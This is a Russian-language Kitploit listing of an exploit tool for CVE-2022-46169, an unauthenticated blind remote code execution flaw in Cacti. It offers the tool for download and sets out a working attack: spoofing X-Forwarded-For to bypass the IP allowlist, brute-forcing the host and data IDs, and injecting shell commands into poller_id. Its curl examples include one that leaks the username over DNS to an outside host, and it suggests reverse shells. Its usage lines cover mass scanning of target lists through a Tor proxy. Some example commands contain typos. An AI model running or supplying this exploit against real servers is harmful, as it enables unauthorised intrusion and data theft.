Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-46169 — CVE-2022-46169 - Cacti: слепое удалённое выполнение кода (без аутентификации) | Kitploit
Инструменты/GitHubGitHub/taythebot/cve-2022-46169
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеRed Teaming
GitHubtaythebot/cve-2022-46169

CVE-2022-46169

CVE-2022-46169 - Cacti: слепое удалённое выполнение кода (без аутентификации)

Репозиторий
123 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-46169

Cacti: слепое удалённое выполнение кода (без аутентификации)

Disclaimer

Этот материал предоставлен только в образовательных целях. Я не несу ответственности за ваши действия. Используйте на свой страх и риск.

Пояснение

Этот скрипт перебирает переменные, необходимые для эксплуатации этой уязвимости. Для эксплуатации требуются следующие 3 переменные:

  • IP-адрес из белого списка
  • Правильный параметр host_id
  • Правильный параметр local_data_ids

Файл remote_agent.php защищён белым списком IP-адресов. Вы можете обойти это, подменив свой IP-адрес в заголовке X-Forwarded-IP. В большинстве случаев в белый список внесены 127.0.0.1 или собственный IP-адрес сервера.

Затем нужно перебрать параметры запроса host_id и local_data_ids. Это делается путём перечисления пар целых чисел со значениями по умолчанию от 1 до 10.

x,y

Пример запроса

root@kitploit:~
pair_x="1"
pair_y="2"
curl -k -H "X-Forwarded-For: 127.0.0.1" \
    "https://target.com/cacti/remote_agent.php?action=polldata&poller_id=1&host_id=$pari_x&=local_data_ids[]=$pair_y"

[]

Эксплуатация

После получения этих 3 переменных вы можете внедрить команду оболочки в ключ poller_id и выйти из него, поставив ; перед вашей командой.

Это слепое RCE (blind RCE), поэтому вам нужно отправить вывод своей команды куда-нибудь, например на interact.sh, или открыть обратную оболочку. Не забудьте URL-кодировать значение poller_id!

Следующий пример выполняет команду ping $(whoami).test.com

root@kitploit:~
curl -k -H "X-Forwarded-For: 127.0.0.01" \
    "https://target.com/cacti/remote_agent.php?action=polldata&host_id=1&local_data_ids[]=3&poller_id=;ping%20%24%28whoami%29.test.com"

Вывод

Скрипт выводит данные в формате CSV. Заголовки: "target", "ip", "host_id", "data_id", "url".

Если значение url отсутствует, это означает, что скрипту удалось обойти ограничение по IP, но не удалось подобрать идентификаторы. Вы можете взять этот результат и задать большее максимальное значение, чтобы попробовать снова.

Обработка вывода

Для быстрой обработки выходного файла можно использовать следующие команды:

Цели с обойдённым IP-ограничением

root@kitploit:~
tail -n +2 results.csv | cut -d ',' -f1 | sort -u

Эксплуатируемые цели

root@kitploit:~
tail -n +2 results.csv | cut -d ',' -f5 | sort -u 

Сборка

root@kitploit:~
go build -v -o bruteforce bruteforce.go

Использование

root@kitploit:~
./bruteforce -l targets.txt -t 50 -min 1 -max 10
  • Цели должны представлять собой список IP-адресов, порт можно не указывать
  • Поддерживается Socks5-прокси -proxy socks5://127.0.0.1:9050
  • Файл вывода по умолчанию — results.csv
Скачать инструмент